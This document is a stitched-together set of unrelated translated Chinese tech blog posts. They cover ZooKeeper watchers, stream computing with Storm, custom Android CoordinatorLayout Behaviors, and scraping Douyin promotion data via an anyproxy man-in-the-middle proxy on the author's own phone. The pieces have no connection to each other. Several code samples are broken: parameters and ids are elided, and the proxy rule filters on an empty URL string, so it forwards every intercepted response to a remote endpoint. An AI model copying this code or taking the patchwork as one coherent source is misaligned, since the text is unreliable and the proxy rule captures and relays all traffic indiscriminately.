The Principle of the ZK Watcher

What is the ZK Watcher?

A common need in ZK applications is knowing the current state of the ZK ensemble. One way to meet it is polling: the ZK client checks on a timer whether the system state has changed. Polling, however, is inefficient, particularly when state changes are infrequent.

To avoid the performance cost of polling, ZK provides a mode in which clients are notified about the particular events they care about: the Watcher mechanism. By registering a Watcher, a ZK client asks to be notified about a specified znode, and receives a notification when that znode changes. For example, a Watcher set on a node that is later deleted will receive the NodeDeleted notification when the deletion happens.

ZK Watcher application code typically follows this framework:

zk.exists("myZnode", myWatcher, existsCallback, null);

Watcher myWatcher = new Watcher() {
  public void process(WatchedEvent event) {
    // process the watch event
  }
};

StatCallback existsCallback = new StatCallback() {
  public void processResult(int rc, String path, Object ctx, Stat stat) {
    // process the result of the exists call
  }
};

The framework above uses the exists operation as an example; it shows the general pattern of calling ZK asynchronously while registering a Watcher.

Classifying WatchedEvents

An important part of using Watchers is understanding how they are set and when they are triggered. Not every ZK operation can set a Watcher, and not every event will trigger one.

Setting aside the connection-state events that overload WatchedEvent, the WatchedEvents encountered in normal operation fall into the following categories:

    NodeCreated – can be set by calling exists; triggered when the znode is newly created

    NodeDeleted – can be set by calling exists or getData; triggered when the znode is deleted

    NodeDataChanged – can be set by calling exists or getData; triggered when the znode's data changes

    NodeChildrenChanged – can be set by calling getChildren; triggered when a direct child of the znode is created or deleted

    DataWatchRemoved – triggered when a Watcher set by exists or getData is removed

    ChildWatchRemoved – triggered when a Watcher set by getChildren is removed

As we can see, only the three operations exists, getData, and getChildren can set a Watcher.

Note that a Watcher set via getData cannot receive a NodeCreated event: when the node does not exist, getData throws KeeperException.NoNodeException and no Watcher is set.

Implementation and life cycle of the Watcher mechanism

From the application's perspective, once a Watcher is registered one can simply wait for events to be triggered, without caring how ZK implements the process. But understanding the concrete implementation helps us find the root cause of errors and anomalies and troubleshoot them in a targeted way.

The two key questions about the Watcher implementation are where exactly a Watcher is registered and how exactly it is triggered. The two are hard to explain separately, so they are analyzed together below.

Ideally this part would be explained alongside the corresponding source code, but the ZK source is hard to read; pasting it here would not aid understanding and might confuse the reader further. Instead, I will describe the code logic at roughly pseudo-code granularity together with the locations of the corresponding source files; interested readers can study the source on their own, and good luck to them.

Let's start the Watcher mechanism from registration. When a ZK client executes an exists, getData, or getChildren operation, it can set a custom Watcher, or reuse the default Watcher configured at client creation by passing a boolean flag. The latter practice is rarely used and will not be covered further. The custom Watcher is packed into a Packet and handed to the ClientCnxn EventThread, which registers it in the client's watch tables when the corresponding operation completes. On the server side, the request (a GetDataRequest, for example) carries a watch flag, from which the server decides whether to set the corresponding Watcher. Here, ZK has ServerCnxn implement the Watcher interface: each ServerCnxn is the server-side object for one client connection, and its process(WatchedEvent) method packs the WatchedEvent into a WatcherEvent and sends it to the client.

After a Watcher is set successfully, it is triggered when the state it cares about changes; in essence this is a callback into client-side processing logic when the state of the ZK ensemble changes. The change of state is judged by the server's state: the server maintains the ensemble state, implemented mainly by ZKDatabase and DataTree. When the server determines that a state change requiring Watchers to fire has occurred, it traverses the Watchers registered on the changed node and calls the process(WatchedEvent) method of each, i.e. of the corresponding client connection. As described above, this sends the WatchedEvent to the corresponding client.

The registration and triggering described above actually cover the Watcher's entire life cycle: it begins when the corresponding operation succeeds on the server side, and ends when the Watcher is triggered. In other words, a Watcher is one-shot: to keep listening to the corresponding node's state, the Watcher must be reset after each trigger. There is one other way a Watcher's life can end: the session being closed or expiring. In addition, since version 3.5.0, ZK supports the removeWatches operation to actively remove Watchers on nodes that are no longer of interest.
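The one-shot semantics can be sketched in a few lines of plain Java (an illustrative model, not ZK's actual classes; the name WatchTable is made up): a trigger removes the path's watchers before notifying them, so a second change on the same path notifies nobody until a watcher is registered again.

```java
import java.util.*;
import java.util.function.Consumer;

// Hypothetical stand-in for ZK's per-path watch tables: one-shot delivery.
class WatchTable {
    private final Map<String, Set<Consumer<String>>> watches = new HashMap<>();

    // Register a watcher on a path (as exists/getData/getChildren would).
    void addWatch(String path, Consumer<String> watcher) {
        watches.computeIfAbsent(path, p -> new HashSet<>()).add(watcher);
    }

    // Trigger: remove the path's watchers first, then notify each exactly once.
    int trigger(String path, String eventType) {
        Set<Consumer<String>> fired = watches.remove(path);
        if (fired == null) return 0;
        for (Consumer<String> w : fired) w.accept(eventType);
        return fired.size();
    }
}
```

A watcher notified once stays gone until re-added, which is exactly why application code re-registers inside its event handler.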

Watcher error handling

As described above, the Watcher is a lightweight change-notification mechanism. Precisely because its function is so simple, building more complex semantics on top of it in practice requires handling the Watcher's behavior under several failure conditions, discussed below.

The first problem stems from the one-shot nature of Watchers and the limited information a WatchedEvent carries. Because a Watcher is one-shot, we may lose events that occur between a Watcher's trigger and its subsequent re-registration. Normally this is not a problem, because ZK's goal is consensus on stored state in a distributed environment, not a guarantee that every client records and processes every event. The read that accompanies re-registering a Watcher is enough to sync us with the latest state at that moment. So although we may miss events, what we miss is at best an intermediate state; what ZK guarantees is the final state over a period of time. From another angle, because a WatchedEvent carries only the fact that an event occurred, any new state must be fetched from the ZK ensemble; this is a trade-off ZK had to make for simplicity of implementation.

The second problem concerns the CONNECTIONLOSS exception. Strictly speaking this is not a Watcher concern, because an operation that fails with CONNECTIONLOSS never set its Watcher successfully in the first place. CONNECTIONLOSS means the client has been disconnected from the server it was connected to; since a ZK ensemble has several servers, the client will then try to connect to another one. Because the Watcher was not set, after a successful reconnection the client should retry the failed operation to set the Watcher correctly. Watchers that had already been set successfully are not affected by such a connection move: on reconnection, the client resends all of its Watchers, and the server compares the znodes' state against the client's last-seen zxid to infer which Watchers need to be triggered; it triggers those, and registers the rest normally.
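The decision the server makes for each resent watch can be sketched as follows (plain Java; ResentWatchJudge is a made-up illustrative name, and the real bookkeeping lives in the server's DataTree): a resent data watch fires immediately if the znode was deleted or modified past the zxid the client last saw, and is otherwise just registered.

```java
import java.util.*;

// Illustrative sketch (not ZK's actual classes) of the judgment applied to
// each watch the client resends after reconnecting.
class ResentWatchJudge {
    // znode path -> zxid of its last modification; absent means deleted.
    private final Map<String, Long> lastModifiedZxid = new HashMap<>();

    void recordChange(String path, long zxid) { lastModifiedZxid.put(path, zxid); }
    void recordDelete(String path)           { lastModifiedZxid.remove(path); }

    // Returns the event to fire now, or null if the watch is simply re-registered.
    String judgeDataWatch(String path, long clientLastZxid) {
        Long mzxid = lastModifiedZxid.get(path);
        if (mzxid == null) return "NodeDeleted";              // node vanished meanwhile
        if (mzxid > clientLastZxid) return "NodeDataChanged"; // changed past what the client saw
        return null;                                          // nothing missed; register the watch
    }
}
```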


The normal flow of the ZK Watcher mechanism is quite smooth, but having to actively fetch the state again after each trigger is rather troublesome, and ZK operations can fail with a variety of strange exceptions. How ZK handles the various exceptions under network delay or partition will be introduced in a separate article. As for ZK's source code: it is harmful to the body, and unless you have symptoms that require it, it is best left unread.


An Introduction to Stream Computing

1. Static data and streaming data

Static data: data stored in bulk, such as the large volume of historical data kept in a data warehouse to support decision analysis.

Streaming data: data that arrives as a large, rapid, time-varying, continuous flow (examples: logs generated in real time, users' real-time trading records).

Streaming data has the following characteristics:

(1) Data arrives continuously and quickly, and its potential size may be unbounded. (2) Data sources are numerous and formats are complex. (3) The volume is large, but storage matters less: once processed, data is either discarded or archived (stored in a data warehouse). (4) The focus is on the overall value of the data, without much concern for individual records. (5) Records may arrive out of order or incomplete; the system cannot control the order in which new data elements arrive to be processed.

In the conventional processing flow, data is always collected first and placed in a DB, and then the data in the DB is processed.

Stream computing: to achieve timeliness, data is consumed in real time as it is collected.

2. Batch computing and stream computing

Batch computing: processes static data with ample time, e.g. Hadoop. Real-time requirements are loose.

Stream computing: acquires massive data in real time from multiple data sources and analyzes it in real time to extract valuable information (real-time, multiple data formats, massive volume).

Stream computing follows one basic idea: the value of data decreases over time, as with a user clickstream. Therefore, an event should be processed as soon as it occurs, rather than being buffered for batch processing. Streaming data, with its complex formats, many sources, and huge volume, is unsuitable for batch computing; it must be computed in real time, with response times of a few seconds. Batch computing cares about throughput; stream computing cares about real-time response.
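The process-on-arrival idea can be illustrated with a minimal sketch (plain Java; the class name is made up): state is updated the moment each event occurs, instead of events being buffered for a later batch job.

```java
import java.util.*;

// Illustrative only: an event-triggered running count, the core pattern of
// stream computing. Each event updates state immediately on arrival,
// so the latest result is always available.
class RunningClickCounter {
    private final Map<String, Integer> countsByUser = new HashMap<>();

    // Called once per event, as soon as it occurs; returns the updated count.
    int onClick(String userId) {
        return countsByUser.merge(userId, 1, Integer::sum);
    }
}
```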

Characteristics of stream computing:

1. Real-time (realtime), unbounded (unbounded) data streams. Stream computing runs in real time over streaming data, and the stream is subscribed to and consumed by the stream computing system in chronological order. Because data keeps being produced, the stream flows into the computing system continuously and over a long period. For example, as long as a website stays up, its click log stream keeps flowing into the computing system. For a stream system, therefore, the data has no real-time endpoint: it is unbounded.

2. Continuous (continuous) and efficient computation. Stream computing is an event-triggered computing model, the trigger source being the unbounded streaming data above. As soon as new data enters the stream, the system immediately launches a computing task, so the computation as a whole is ongoing.

3. Streaming (streaming) integration of real-time results. The results triggered by a data stream can be written directly to a destination data store; for example, computed report data can be written directly to an RDS for display. The results thus flow, like streaming data themselves, continuously into the destination data store.

3. Stream computing frameworks

Processing streaming data in a timely fashion requires a low-latency, scalable, highly reliable processing engine. A stream computing system should meet the following requirements:

  • High performance: the basic requirement for big data, e.g. processing hundreds of thousands of records per second.
  • Massive scale: support for data at TB and even PB scale.
  • Real-time: latency kept low, at second or even millisecond level.
  • Distributed: a must for supporting big data; the architecture must scale out smoothly.
  • Ease of use: quick to develop and deploy.
  • Reliability: streaming data processed reliably.

Common stream computing frameworks and platforms fall into three groups: commercial stream computing platforms, open-source stream computing frameworks, and stream computing frameworks that companies develop to support their own business.

(1) Commercial: InfoSphere Streams (IBM) and StreamBase (TIBCO).

(2) Open-source stream computing frameworks, represented by: Storm (Twitter), S4 (Yahoo).

(3) Stream computing frameworks developed by companies to support their own business: Puma (Facebook), DStream (Baidu), the Galaxy streaming data processing platform (Taobao).

4. Storm, a stream computing framework

Twitter Storm is an open-source distributed real-time big data processing framework. As stream computing becomes more widely applied, Storm's visibility and importance keep growing. The following introduces Storm's core components and a performance comparison.

Storm core components

  • Nimbus: Storm's master, responsible for resource allocation and task scheduling. A Storm cluster has only one Nimbus.
  • Supervisor: Storm's slave, responsible for accepting the tasks assigned by Nimbus and managing all of its Workers; a Supervisor node contains multiple Worker processes.
  • Worker: a work process; each Worker process runs multiple Tasks.
  • Task: a task; in a Storm cluster each Spout and Bolt is executed by a number of tasks, and each task corresponds to one thread of execution.
  • Topology: a computing topology; a Storm topology packages the logic of a real-time computing application. Its role is very similar to a MapReduce job (Job), except that a MapReduce job eventually ends once it has produced its result, whereas a topology keeps running in the cluster until you terminate it manually. A topology can also be understood as a graph of Spouts and Bolts connected by stream groupings (Stream Grouping).
  • Stream: the data stream (Streams) is the core abstraction in Storm. A data stream is an unbounded sequence of tuples (tuple) created and processed in parallel in a distributed environment. Streams are defined by a schema naming the fields (Fields) of their tuples.
  • Spout: a data source (Spout) is the source of the streams in a topology. A Spout usually reads tuples from an external source and emits them into the topology. Depending on the need, a Spout can be defined as a reliable or an unreliable data source: a reliable Spout can re-emit a tuple when the tuple it sent fails to be processed, ensuring all tuples are processed correctly, whereas an unreliable Spout does nothing further with a tuple once it has been emitted. A Spout can emit multiple streams.
  • Bolt: all data processing in a topology is done by Bolts. Through filtering (filtering), functions (functions), aggregations (aggregations), joins (joins), database interaction, and so on, Bolts can meet virtually any data processing need. A Bolt can perform a simple stream transformation, while more complex transformations often require multiple steps and therefore multiple Bolts.
  • Stream grouping: determining the input streams of each Bolt is an important part of defining a topology. A stream grouping defines how a stream is partitioned among a Bolt's different tasks (Tasks). Storm has eight built-in stream groupings.
  • Reliability: Storm can guarantee that every tuple emitted by a topology is processed correctly. By tracking the tree of tuples descended from each tuple a Spout emits, it can determine whether the original tuple has been fully processed. Every topology has a "message timeout" parameter; if Storm does not detect that a tuple has been fully processed within that timeout, it marks the tuple as failed and re-emits it later.
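Leaving the Storm API aside, the Spout-to-Bolt tuple flow can be sketched with plain-Java stand-ins (SimpleBolt, WordSplitBolt, and SimpleTopology are illustrative names, not Storm classes): a spout's tuples are pushed through a bolt, which emits transformed tuples downstream.

```java
import java.util.*;

// Illustrative stand-ins for the Spout/Bolt roles (not the Storm API).
interface SimpleBolt { void execute(String tuple, List<String> emitted); }

// A typical first Bolt in a word-count topology: split sentences into words.
class WordSplitBolt implements SimpleBolt {
    public void execute(String tuple, List<String> emitted) {
        for (String w : tuple.split("\\s+")) emitted.add(w);
    }
}

class SimpleTopology {
    // Run a spout's tuples through one bolt and collect the output stream.
    static List<String> run(List<String> spoutTuples, SimpleBolt bolt) {
        List<String> out = new ArrayList<>();
        for (String t : spoutTuples) bolt.execute(t, out);
        return out;
    }
}
```

In real Storm the "spout tuples" list would be unbounded and the bolt's output would feed further bolts according to the stream grouping.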

(Figure 1: Storm core components)

(Figure 2: Storm programming model)

Comparison of mainstream computing engines

The more popular real-time processing engines are Storm, Spark Streaming, and Flink. Each engine has its own characteristics and application scenarios. The figure below gives a simple comparison of the three engines.

(Figure 3: performance comparison of the main engines)

Summary: the emergence of stream computing expands our ability to handle complex real-time computing needs. Storm, as a stream computing tool, greatly helps our applications. Stream computing engines are still evolving: JStorm, which greatly improves on Storm, and Flink-based engines such as Blink have advanced performance in every respect. Stream computing deserves our continued attention.












Author: Yao Yuan

Source: CreditEase Institute of Technology



Custom Behavior – a faithful imitation of the QQ Browser home page and the Meituan merchant details page


I remember writing an article on custom Behaviors two years ago, Custom Behavior – Imitating the Sina Weibo Discover Page, which by now has over ten thousand reads.

Today's post upgrades that Behavior. Compared with the version from two years ago, it adds the following features:

    A callback listener for the sliding process, exposing the sliding distance so outer code can run the corresponding animations and show cool UI; set via setPagerStateListener

    When the Header has slid to the top, it can optionally be reopened by sliding down; set via the method setCouldScroollOpen

    A fling callback when a finger flings the header, so the list content can optionally continue the slide as needed; set via the method setOnHeaderFlingListener

    HeaderBehavior and ContentBehavior code cleanup: business logic is peeled off to make reuse easier.

Effect demonstrations


First, let's look at the effect of the Sina Weibo Discover page:

Next, the effect we implemented two years ago, modeled on Sina Weibo:

Imitating QQ Browser:

Imitating the Meituan merchant details page:

Analysis:

There are two states: open and closed.

    The open state is when the Tab + ViewPager has not yet slid to the top and the Header has not been completely moved off screen

    The closed state is when the Tab + ViewPager has slid to the top and the Header has been moved off screen

From the renderings we can see that in the open state, when we slide the RecyclerView inside the ViewPager upward, the RecyclerView itself does not move up (its scroll events are handed to the outer container for processing, which consumes them all), and the whole layout (Header + Tab + ViewPager) shifts upward instead. Once the Tab has slid to the top, sliding the RecyclerView up scrolls it normally; at that point the outer container no longer intercepts the scroll events.

We can also see that in the open state, pull-to-refresh is not supported. This is easy to implement: listen to the page state, and when the state is open, call setEnabled(false) on the SwipeRefreshLayout so it does not intercept events; when the page closes, call setEnabled(true) so pull-to-refresh is supported again.

Based on this analysis, we can divide the whole effect into three parts:

    Part one, the Header: while the Header has not slid to the top (i.e. while open), it follows the swipe.
    Part two, the Content: when sliding up with the Header in the open state, the Header slides but the RecyclerView content does not scroll; when the Header is in the closed state, sliding up scrolls the RecyclerView. When sliding down, the Header does not follow; only the RecyclerView content scrolls.
    Part three, the Search bar: when we slide up, the Search bar follows the slide and ultimately stays at a fixed position.

We define the relationship among the three parts as: the Content depends on the Header. When the Header moves, the Content follows. So when handling scroll events, we only need the Header's Behavior to handle them correctly; the Content's Behavior does not need to handle scroll events at all, it just depends on the Header and moves along with it. Likewise, the Search bar's Behavior does not need to handle scroll events; it simply depends on the Header and moves along accordingly.

As for the concrete implementation, see Custom Behavior – Imitating the Sina Weibo Discover Page; the core idea is similar and is not repeated here.

Instructions for use

Here we use the QQ-Browser-like demo to explain.

Let's see how to use it. Simply put, there are just two steps:

    Step one: in the xml file, specify the corresponding Behavior for the header part and the content part respectively

    Step two: configure a few parameters in code

Step one: write the xml file and specify the appropriate Behaviors














Step two: dynamically set some parameters in code

private void initBehavior() {
    Resources resources = DemoApplication.getAppContext().getResources();
    mHeaderBehavior = (QQBrowserHeaderBehavior) ((CoordinatorLayout.LayoutParams)
            findViewById( /* header view id, elided in the original */ ).getLayoutParams()).getBehavior();
    mHeaderBehavior.setPagerStateListener(new QQBrowserHeaderBehavior.OnPagerStateListener() {
        public void onPagerClosed() {
            if (BuildConfig.DEBUG) {
                Log.d(TAG, "onPagerClosed: ");
            }
            Snackbar.make(mNewsPager, "pager closed", Snackbar.LENGTH_SHORT).show();
            setViewPagerScrollEnable(mNewsPager, true);
        }

        public void onScrollChange(boolean isUp, int dy, int type) {
        }

        public void onPagerOpened() {
            Snackbar.make(mNewsPager, "pager opened", Snackbar.LENGTH_SHORT).show();
        }
    });
    // set to the negative of the header height
    mHeaderBehavior.setHeaderOffsetRange( /* arg elided in the original */ );
    // set whether the header, when closed, can be reopened by sliding
    mHeaderBehavior.setCouldScroollOpen(false);
    mContentBehavior = (QQBrowserContentBehavior) ((CoordinatorLayout.LayoutParams)
            findViewById( /* content view id, elided in the original */ ).getLayoutParams()).getBehavior();
    // set which id to depend on; this must be the Header layout id
    mContentBehavior.setDependsLayoutId( /* header layout id, elided in the original */ );
    // set the final resting position of the content part
    mContentBehavior.setFinalY( /* arg elided in the original */ );
}

mHeaderBehavior.setHeaderOffsetRange sets the offset range of the Header; since we move it via translationY, we generally set it to the negative of the header height.
    mHeaderBehavior.setCouldScroollOpen(false) sets whether the header, when closed, can be reopened by sliding.

mContentBehavior.setDependsLayoutId sets which id is depended on; here it must be set to the Header layout id. mContentBehavior.setFinalY sets the final resting position of the content part.

Let's look at the OnPagerStateListener callback:

/**
 * callback for HeaderPager's state
 */
public interface OnPagerStateListener {
    /**
     * called back when the pager is closed
     */
    void onPagerClosed();

    /**
     * called back on scroll
     * @param isUp whether scrolling up
     * @param dy   child.getTranslationY()
     * @param type touch or not touch: TYPE_TOUCH, TYPE_NON_TOUCH
     */
    void onScrollChange(boolean isUp, int dy, @ViewCompat.NestedScrollType int type);

    /**
     * called back when the pager is opened
     */
    void onPagerOpened();
}

There are three main methods. The first, onPagerClosed, is called back when the header closes. The second, onScrollChange, is called back whenever the header's slide distance changes; it has three parameters: isUp says whether we are sliding upward, dy is the header's offset, and type is the touch type, touch or non-touch (i.e. a fling).

If you want some cool effects, you can animate the different Views in onScrollChange according to the slide distance.

Imitating the Meituan merchant details page

The steps are the same as for the QQ-Browser-like demo above and are not repeated here; a few key points:
    First: when the header is closed, we can reopen it by sliding; this is done by calling mHeaderBehavior.setCouldScroollOpen(true).
    Second: when the header is flung, you can see that the RecyclerView content also scrolls; we do this in the header's fling event, by manually calling the RecyclerView's smoothScrollBy at onFlingStart time.

mHeaderBehavior.setOnHeaderFlingListener(new HeaderFlingRunnable.OnHeaderFlingListener() {
    public void onFlingFinish() {
    }

    public void onFlingStart(View child, View target, float velocityX, float velocityY) {
        Log.i(TAG, "onFlingStart: velocityY =" + velocityY);
        if (velocityY < 0) {
            mRecyclerView.smoothScrollBy(0, (int) Math.abs(velocityY), new AccelerateDecelerateInterpolator());
        }
    }

    public void onHeaderClose() {
    }

    public void onHeaderOpen() {
    }
});

Pitfalls encountered

The header section could not respond to scroll events

Our header is a custom NestedLinearLayout. We override its onTouchEvent and, through the NestedScrolling mechanism, pass the events to the NestedScrollingParent, i.e. the CoordinatorLayout, which in turn hands them to its child Views' Behaviors for processing.

public boolean onTouchEvent(MotionEvent event) {
    final int action = MotionEventCompat.getActionMasked(event);
    switch (action) {
        case MotionEvent.ACTION_DOWN:
            lastY = (int) event.getRawY();
            startNestedScroll(ViewCompat.SCROLL_AXIS_HORIZONTAL
                    | ViewCompat.SCROLL_AXIS_VERTICAL);
            break;
        case MotionEvent.ACTION_MOVE:
            int dy = (int) (event.getRawY() - lastY);
            lastY = (int) event.getRawY();
            // dy < 0: sliding up; dy > 0: pulling down
            if (dy < 0) { // when sliding up, hand it to the parent
                if (startNestedScroll(ViewCompat.SCROLL_AXIS_VERTICAL) // found a parent that supports nested scrolling
                        && dispatchNestedPreScroll(0, -dy, consumed, offset)) {
                    // the parent performed part of the scroll
                }
            } else {
                if (startNestedScroll(ViewCompat.SCROLL_AXIS_VERTICAL) // found a parent that supports nested scrolling
                        && dispatchNestedScroll(0, 0, 0, -dy, offset)) {
                    // the parent performed part of the scroll
                }
            }
            break;
        case MotionEvent.ACTION_CANCEL:
        case MotionEvent.ACTION_UP:
            stopNestedScroll();
            break;
    }
    return super.onTouchEvent(event);
}

When a click listener was set on a child View of the header, the header would not slide

Anyone with some understanding of Android's event dispatch mechanism knows that, by default, it works like this:

When a TouchEvent occurs, the Activity first passes it to the topmost View; the TouchEvent first reaches the top-level View's dispatchTouchEvent, which then distributes it.

  • If dispatchTouchEvent returns true, the event is consumed and dispatch ends.

  • If dispatchTouchEvent returns false, the event is passed back to the parent View's onTouchEvent for processing: if onTouchEvent returns true, the event ends; if it returns false, it goes up to the next parent View's onTouchEvent.

  • If dispatchTouchEvent calls super, the default implementation invokes the View's own onInterceptTouchEvent:
        By default, onInterceptTouchEvent calls super, which returns false, so the event is handed to the child View's dispatchTouchEvent for processing.
        If onInterceptTouchEvent returns true, the event is intercepted and handed to the View's own onTouchEvent.
        If onInterceptTouchEvent returns false, the event is passed to the child View, and dispatch starts again from the child's dispatchTouchEvent.

So when we set a click listener on a child View, because the parent by default does not intercept events, the events reach the child View's onTouchEvent; since the click listener consumes the events, the parent View's onTouchEvent never receives the ACTION_MOVE events.
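That reasoning can be checked with a small simulation (plain Java, not the Android framework; ViewGroupSim is a made-up name): with a clickable child and a parent that never intercepts, the parent's onTouchEvent sees nothing; intercepting MOVE routes those events back to the parent.

```java
import java.util.*;

// Illustrative simulation of the dispatch rules above (not the Android API).
class ViewGroupSim {
    final List<String> parentHandled = new ArrayList<>();
    final boolean childClickable;

    ViewGroupSim(boolean childClickable) { this.childClickable = childClickable; }

    // Default: the parent does not intercept anything.
    boolean onInterceptTouchEvent(String action) { return false; }

    void dispatchTouchEvent(String action) {
        if (onInterceptTouchEvent(action) || !childClickable) {
            parentHandled.add(action); // the parent's onTouchEvent gets the event
        }
        // otherwise the clickable child's onTouchEvent consumes it
    }
}
```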

The solution: override NestedLinearLayout's onInterceptTouchEvent and return true for ACTION_MOVE events. Intercepting them means its own onTouchEvent is called, which guarantees it can slide.

public boolean onInterceptTouchEvent(MotionEvent event) {
    switch (event.getAction()) {
        case MotionEvent.ACTION_DOWN:
            mDownY = (int) event.getRawY();
            // when sliding starts, tell the parent view
            startNestedScroll(ViewCompat.SCROLL_AXIS_HORIZONTAL
                    | ViewCompat.SCROLL_AXIS_VERTICAL);
            break;
        case MotionEvent.ACTION_MOVE:
            // make sure not to consume the ACTION_DOWN event
            if (Math.abs(event.getRawY() - mDownY) > mScaledTouchSlop) {
                logD("onInterceptTouchEvent: ACTION_MOVE  mScaledTouchSlop =" + mScaledTouchSlop);
                return true;
            }
            break;
    }
    return super.onInterceptTouchEvent(event);
}

But there is a pit here: a normal click triggers ACTION_DOWN, ACTION_MOVE, ACTION_UP, so if we return true directly for ACTION_MOVE, the child View's onClick will never fire.


The fix is to intercept only once the movement exceeds the system touch slop:

final ViewConfiguration configuration = ViewConfiguration.get(getContext());
mScaledTouchSlop = configuration.getScaledTouchSlop();
if (Math.abs(event.getRawY() - mDownY) > mScaledTouchSlop) {
    return true;
}
On resolving slide conflicts, you can read my earlier post: ViewPager, ScrollView nested ViewPager slide conflict resolution.

How to detect a fling on the header

We do it with the gesture processor GestureDetector; of course you could also compute it with VelocityTracker, but that is more complicated.

GestureDetector.OnGestureListener onGestureListener = new GestureDetector.OnGestureListener() {

    public boolean onDown(MotionEvent e) {
        return false;
    }

    // ----- several methods omitted -----

    public boolean onFling(MotionEvent e1, MotionEvent e2, float velocityX, float velocityY) {
        Log.d(TAG, "onFling: velocityY =" + velocityY);
        // fling((int) velocityY);
        getScrollingChildHelper().dispatchNestedPreFling(velocityX, velocityY);
        return false;
    }
};

mGestureDetector = new GestureDetector(getContext(), onGestureListener);

public boolean onTouchEvent(MotionEvent event) {
    mGestureDetector.onTouchEvent(event); // hand the events to the detector
    ...
}

Sometimes, keeping notes really does matter.

I wrote this post because I had to build a similar effect in a project. At first I really had no idea where to start, but I clearly remembered writing a similar article two years ago, even though the concrete implementation was long forgotten. I reread the two-year-old post, organized my thoughts, moved the code into the project, and discovered a few pits. After some tinkering, the pits were filled.

Imagine if the principle had never been recorded: the effect would have been genuinely hard to achieve. If you are not familiar with the CoordinatorLayout, Behavior, and NestedScroll mechanisms, you simply cannot implement it. After writing Custom Behavior – Imitating the Sina Weibo Discover Page two years ago, I received many private messages saying the sender had struggled with this effect for over two weeks without success and was very grateful for the post. So from now on, I will try to keep notes. Truly, the palest ink beats the best memory.

The second, deeper feeling: when I first reread the code I wrote two years ago, my immediate reaction was, what is this garbage code? Indeed, many places were quite bad: the Behavior was coupled to business logic, hard to reuse, and hard to maintain. So this time, I pulled the Behavior out in my spare time, and implementing a similar effect became easy: biu biu biu.

So much said; to summarize:

    Keep notes, especially about principles

    Hold code in awe; no more to say, experience it yourself

    Keep a humble heart


If you found this useful, scan the QR code to follow my WeChat public account, or star my repo on GitHub. Thank you!


Scraping Douyin data and the Taobao data behind it

Background analysis

As of July this year, Douyin's daily active users exceeded 320 million. Douyin president Zhang Nan predicts that by 2020 the total daily active users of the domestic short-video industry will reach 1 billion. Douyin has launched multiple monetization channels so that its 10 million creators can make money, and Douyin says it wants those 10 million creators to earn through many different means. What I want to share today is the Taobao chain behind Douyin. When browsing Douyin videos, you'll find that some of them promote Taobao products; this is one of the creators' monetization channels. From a Taobao seller's perspective, asking Douyin influencers to promote your products means paying the influencers a certain advertising fee. From Taobao's perspective, Taobao has a platform called the Taobao Union: everyone who helps Taobao sell products is defined by the Union as a "Taobao-ke", and whenever a product promoted by a Taobao-ke is purchased, the Union pays that Taobao-ke a certain percentage as commission. In short, a Douyin influencer's income has two parts: the Taobao seller's advertising fee plus (provided a sale closes) the Taobao Union commission. This article analyzes the posting chain from Douyin influencers to Taobao.


Douyin posts





Post text


We can see a shopping-cart icon in the bottom-left corner. Yes, that is the link to the Taobao product; clicking it opens the following





This is the product the influencer's post promotes; clicking it jumps to the Taobao app

In summary, we can crawl the product data behind an influencer's post list and analyze it, and from that obtain the data of the corresponding Taobao shops.


Capturing Douyin app packets


This capture used Douyin version 8.0.0 on an iPhone, with anyproxy as the proxy packet-capture tool

anyproxy is an excellent proxy tool developed by Alibaba; there is also the foreign-made mitmproxy

The anyproxy installation guide can be found at:

anyproxy official site: (it seemingly needs a stable international network connection to access)

anyproxy project address:


We can use either anyproxy or mitmproxy as the capture and analysis tool:

anyproxy is based on Node.js (recommended if you are familiar with Node.js)

mitmproxy is based on Python (recommended if you are familiar with Python)

Both tools can intercept and forward data, and both work on the man-in-the-middle principle, which is also the principle behind the crawler we develop here. Of course, if you are merely doing traffic analysis, an ordinary packet-capture tool such as Fiddler or Charles will do.

After installing anyproxy, the phone must trust its certificate and be configured to use it as a proxy

For the proxy settings, anyproxy uses port 8001 as the default proxy port



Proxy settings





Setting up a trust certificate



On the phone, open the Douyin app and browse to an influencer's post list




The influencer's post-list page


On the computer, open http://localhost:8002/ to see all the traffic flowing through the phone, which of course includes the Douyin app's data; there you can find the influencer post links.

Add a URL filter condition: https://





Looking at each post, we can see a field called simple_promotions; this field carries the promoted product's information. We can save the product ID from this data, then use the ID to fetch the product's Taobao shop information.
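As a rough sketch of that step, the promotion IDs could be pulled out of the captured body with a regular expression; note that the "promotion_id" field name here is an assumption, so inspect the real simple_promotions payload for the actual key:

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class PromotionIdExtractor {
    // Naive sketch: pull promoted-product IDs out of a captured JSON body.
    // The "promotion_id" field name is an assumption; check the real
    // simple_promotions payload for the actual key.
    static List<String> extractIds(String body) {
        List<String> ids = new ArrayList<>();
        Matcher m = Pattern.compile("\"promotion_id\"\\s*:\\s*\"?(\\d+)\"?").matcher(body);
        while (m.find()) {
            ids.add(;   // capture group 1 holds the digits
        }
        return ids;
    }
}
```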






anyproxy's default interception and forwarding settings




To explain: by default, running anyproxy -i in the terminal makes anyproxy load the file /usr/local/lib/node_modules/anyproxy/lib/rule_default.js. Since we need to intercept Douyin data, we create a douyin.js file in the same directory and run anyproxy -i douyin.js; anyproxy will then intercept and forward according to the logic inside douyin.js. That is the default file location on macOS; on Windows, do a global search for rule_default.js to find it.

The douyin.js file's code is as follows


'use strict';

module.exports = {

  summary: 'the default rule for AnyProxy',

  /**
   * @param {object} requestDetail
   * @param {string} requestDetail.protocol
   * @param {object} requestDetail.requestOptions
   * @param {object} requestDetail.requestData
   * @param {object} requestDetail.response
   * @param {number} requestDetail.response.statusCode
   * @param {object} requestDetail.response.header
   * @param {buffer} requestDetail.response.body
   * @returns
   */
  *beforeSendRequest(requestDetail) {
    console.log('this is request');
    return null;
  },

  /**
   * Set up the interception of the Douyin data
   * @param {object} requestDetail
   * @param {object} responseDetail
   */
  *beforeSendResponse(requestDetail, responseDetail) {
      if (requestDetail.url.indexOf('') >= 0) {    // the influencer's detail data from the app
          const newResponse = responseDetail.response;
          newResponse.body = newResponse.body.toString();
          const posturl = "/WebCrawler/douyin/AppUserData";
          HttpPost(newResponse.body, requestDetail.url, posturl);
          console.log('forwarding the influencer detail data from the app');
      }
      return null;
  },

  /**
   * default to return null
   * the user MUST return a boolean when they do implement the interface in rule
   * @param {any} requestDetail
   * @returns
   */
  *beforeDealHttpsRequest(requestDetail) {
    return null;
  },

  /**
   * @param {any} requestDetail
   * @param {any} error
   * @returns
   */
